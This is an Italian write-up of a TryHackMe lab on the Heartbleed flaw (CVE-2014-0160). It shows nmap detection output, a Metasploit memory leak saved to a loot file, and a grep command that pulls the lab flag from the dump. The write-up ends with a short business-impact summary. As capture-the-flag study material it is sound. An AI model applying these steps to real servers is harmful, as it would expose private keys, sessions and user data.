
L'obiettivo di questo progetto era valutare un host remoto per la vulnerabilità Heartbleed (CVE-2014-0160), verificarne la presenza e sfruttarla per estrarre informazioni potenzialmente sensibili dalla memoria del server tramite il protocollo TLS.
Obiettivo L'obiettivo di questo progetto era valutare un host remoto per la vulnerabilità Heartbleed (CVE-2014-0160), verificarne la presenza e sfruttarla per estrarre potenziali informazioni sensibili dalla memoria del server tramite il protocollo TLS.
Esecuzione
plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7
| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 Il certificato TLS era autofirmato e scaduto. Ciò ha fatto sospettare che la versione di OpenSSL potesse essere obsoleta. Porta target: 443.
plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 Il target è confermato vulnerabile a Heartbleed.
plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin La memoria è stata scaricata con successo e salvata localmente per l'analisi.
strings openssl.heartble_152689.bin | grep -i "THM{" Risultato:
plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} Dati riservati, incluso un flag dell'applicazione, sono stati estratti con successo dalla memoria TLS — confermando che la vulnerabilità può essere sfruttata praticamente per divulgare informazioni sensibili.
Conclusione Ho identificato e sfruttato con successo CVE-2014-0160 su un server remoto. Il processo ha incluso:
Rilevamento della vulnerabilità con nmap
Sfruttamento della falla usando Metasploit
Estrazione di dati utente inviati in tempo reale (incluso il flag THM{sSl-Is-BaD}) dalla memoria
Impatto Aziendale La presenza di Heartbleed in un sistema esposto pubblicamente rappresenta un rischio critico:
Potenziale divulgazione delle chiavi private TLS
Hijacking di sessione
Esposizione di nomi utente, email e input utente sensibili